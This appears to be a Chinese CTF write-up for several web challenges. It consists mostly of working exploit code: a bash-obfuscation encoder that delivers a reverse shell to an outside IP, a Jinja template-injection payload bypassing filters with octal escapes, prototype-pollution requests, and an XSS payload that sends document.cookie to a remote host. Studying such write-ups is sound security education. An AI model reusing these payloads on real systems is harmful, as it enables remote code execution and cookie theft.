安洵杯 – WEB – Write UP

/ 0评 / 0

被队友带躺了,这里复制下 呜呜呜大师傅们太猛了8
 

WEB

BASH

发现$0 = sh

https://hack.more.systems/writeup/2017/12/30/34c3ctf-minbashmaxfun/

找到了这个

这里只是1 但是1=${##}

${!#} = ${0}

#from pwn import *
import sys
import requests
url = "http://47.108.162.43:30023"
def send_cmd(cmd):
    #r = remote("35.198.107.77", 1337)
    payload = build_payload(cmd)
    data = {
        "cmd":payload
    }
    req= requests.post(url,data=data)
    print(req.text)
def nextpid(r):
    r.sendline(b"$$")
    r.readuntil(b"bash: ")
    pid = int(r.readuntil(b":")[:-1], 10)
    print("current pid: {}".format(pid))
    r.readline()
    return pid + 1
base_payload = rb"${0}<<<${0}\<\<\<${0}\\\<\\\<\\\<${0}\\\\\\\<\\\\\\\<\\\\\\\<\\\\\\\$\\\\\\\'"
base_payload_end = rb"\\\\\\\'"
def build_payload(string):
    bstr = string.encode()
    payload = base_payload
    for char in bstr:
        payload += encode_character(char)
    payload += base_payload_end
    return payload
def encode_character(byte):
    octals = "{:o}".format(byte)
    payload = rb"\\\\\\\\"
    for octal in octals:
        num = int(octal, 8)
        if num == 0:
            payload += rb"$#"
        elif num == 1:
            payload += rb"${##}"
        else:
            payload += rb"\\\$\\\(\\\("
            payload += rb"\$\'\\$$\'".join([rb"${##}" for i in range(num)])
            payload += rb"\\\)\\\)"
    return payload
#while True:
cmd = "bash -i >& /dev/tcp/132.232.82.54/9998 0>&1"
send_cmd

但是shell一直没弹出来 研究了下他的构造方式,guoke自己写了个exp

 

命令执行脚本(guoke yydstxdy)

import sys
start=r"$0<<<$0\<\<\<"
for i in sys.argv[1]:
    payload=str(bin(int(oct(ord(i)))))[2:].replace('1','${##}').replace('0','$#')
    start+=r"$\'\\$(($((${##}<<${##}))#"+payload+r"))\'"
print(start)
#python exp.py "ls>1.txt"

normal

http://47.108.162.43:30023/test?url={%print%0a(lipsum|attr("\137\137\147\154\157\142\141\154\163\137\137"))|attr("\137\137\147\145\164\151\164\145\155\137\137")("\137\137\142\165\151\154\164\151\156\163\137\137")|attr("\137\137\147\145\164\151\164\145\155\137\137")("\145\166\141\154")("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\160\157\160\145\156\50\47\143\141\164\40\57\146\154\141\147\47\51\56\162\145\141\144\50\51")%}

%0a代替空格attr+8进制绕过

Validator

http://47.108.162.43:30023/app.js

http://47.108.162.43:30023/package.json

https://github.com/NeSE-Team/XNUCA2020Qualifier/tree/main/Web/oooooooldjs

有payload。一把梭

curl -vv --header 'Content-type: application/json' -d '{"__proto__": ["system_open": "yes"]}'  http://47.108.162.43:30023/

easyxss

直接原型链污染即可

详细见推特https://twitter.com/S1r1u5_/status/1328371034064515077

{"__proto__":{"preventDefault":"x","handleObj":"x","delegateTarget":"<img/src/onerror=alert(1337)>"}}

所以最后是

http://47.108.162.43:3000/?data={%22__proto__%22:{%22preventDefault%22:%22x%22,%22handleObj%22:%22x%22,%22delegateTarget%22:%22%3Cimg/src/onerror=fetch(%27http://132.232.82.54:9999/?flag%3d%27%2bdocument.cookie)%3E%22}}
r然后出题人找了下 说是非预期 等一手预期解

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注